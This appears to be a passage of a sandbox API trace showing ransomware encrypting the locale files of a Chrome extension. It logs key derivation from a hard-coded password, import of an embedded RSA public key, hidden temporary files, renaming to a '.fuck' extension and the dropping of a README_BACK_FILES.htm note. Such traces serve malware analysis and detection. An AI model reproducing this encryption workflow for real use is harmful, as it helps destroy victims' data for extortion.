FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0258.014] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.014] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.014] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.014] GetLastError () returned 0x0 [0258.014] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json")) returned 0x20 [0258.014] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json", dwFileAttributes=0x80) returned 1 [0258.015] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.016] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.017] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.017] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.020] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.020] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.020] CryptHashData (hHash=0x2e7fa40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.020] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fa40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fdc0) returned 1 [0258.020] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.020] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.020] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a588) returned 1 [0258.020] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a588, dwCertEncodingType=0x1, pInfo=0x2e24a80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24ab0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24ab8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7f940) returned 1 [0258.020] CryptEncrypt (in: hKey=0x2e7f940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.020] CryptEncrypt (in: hKey=0x2e7f940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7acf8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7acf8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.021] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7acf8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7acf8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.022] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x115, lpOverlapped=0x0) returned 1 [0258.023] CryptEncrypt (in: hKey=0x2e7fdc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x115, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0258.023] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0258.023] CloseHandle (hObject=0x5d60) returned 1 [0258.023] CloseHandle (hObject=0x5d5c) returned 1 [0258.024] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json"), bFailIfExists=0) returned 1 [0258.027] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json", dwFileAttributes=0x0) returned 1 [0258.028] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.gsg")) returned 1 [0258.029] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\messages.json.fuck")) returned 1 [0258.030] CryptDestroyHash (hHash=0x2e7fa40) returned 1 [0258.030] CryptDestroyKey (hKey=0x2e7fdc0) returned 1 [0258.030] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.030] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.030] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.031] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\readme_back_files.htm")) returned 0xffffffff [0258.031] AreFileApisANSI () returned 1 [0258.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.031] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.031] GetFileType (hFile=0x5d50) returned 0x1 [0258.031] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.032] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.033] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fa40 [0258.037] FindNextFileA (in: hFindFile=0x2e7fa40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.037] FindNextFileA (in: hFindFile=0x2e7fa40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.037] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.037] GetLastError () returned 0x0 [0258.037] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json")) returned 0x20 [0258.037] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0258.038] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.038] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.039] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.039] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.041] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.041] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.042] CryptHashData (hHash=0x2e7fb00, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.042] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fb00, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fd40) returned 1 [0258.042] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.042] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.042] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a9c8) returned 1 [0258.042] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a9c8, dwCertEncodingType=0x1, pInfo=0x2e249b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e249e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e249e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fd80) returned 1 [0258.042] CryptEncrypt (in: hKey=0x2e7fd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.042] CryptEncrypt (in: hKey=0x2e7fd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79ea0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79ea0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.043] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79ea0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79ea0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.044] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x125, lpOverlapped=0x0) returned 1 [0258.046] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x125, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0258.046] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0258.046] CloseHandle (hObject=0x5d5c) returned 1 [0258.046] CloseHandle (hObject=0x5d60) returned 1 [0258.046] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0258.050] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0258.051] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.gsg")) returned 1 [0258.052] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\messages.json.fuck")) returned 1 [0258.053] CryptDestroyHash (hHash=0x2e7fb00) returned 1 [0258.053] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0258.053] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.053] FindNextFileA (in: hFindFile=0x2e7fa40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.053] FindClose (in: hFindFile=0x2e7fa40 | out: hFindFile=0x2e7fa40) returned 1 [0258.054] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0258.054] AreFileApisANSI () returned 1 [0258.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.054] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.054] GetFileType (hFile=0x5d50) returned 0x1 [0258.055] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.056] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.056] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ff00 [0258.056] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.056] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.056] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.056] GetLastError () returned 0x0 [0258.056] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json")) returned 0x20 [0258.056] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0258.057] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.057] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.059] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.059] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.062] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.062] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.062] CryptHashData (hHash=0x2e7fdc0, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.062] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fdc0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fe40) returned 1 [0258.062] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 